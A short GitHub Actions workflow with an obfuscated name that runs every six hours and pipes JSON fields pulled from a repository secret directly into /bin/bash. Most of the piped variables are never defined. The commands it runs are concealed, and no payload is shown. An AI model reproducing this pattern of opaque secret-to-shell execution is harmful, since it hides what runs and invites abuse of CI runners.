name: huashuaibei3217

on:
  workflow_dispatch:
  schedule:
    - cron: '45 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huashuaibei3217
        env:
          bp80: ${{ secrets.bp80 }}
        run: |
          echo $bp80 | jq -r .dyzzy19 | /bin/bash
          echo $bs7555 | jq -r .vuqs74290 | /bin/bash
          echo $dsu4641 | jq -r .z162 | /bin/bash
          echo $k6638 | jq -r .cq6 | /bin/bash
          echo $cco4 | jq -r .hofi27 | /bin/bash
          echo $lx53111 | jq -r .qxf23447 | /bin/bash

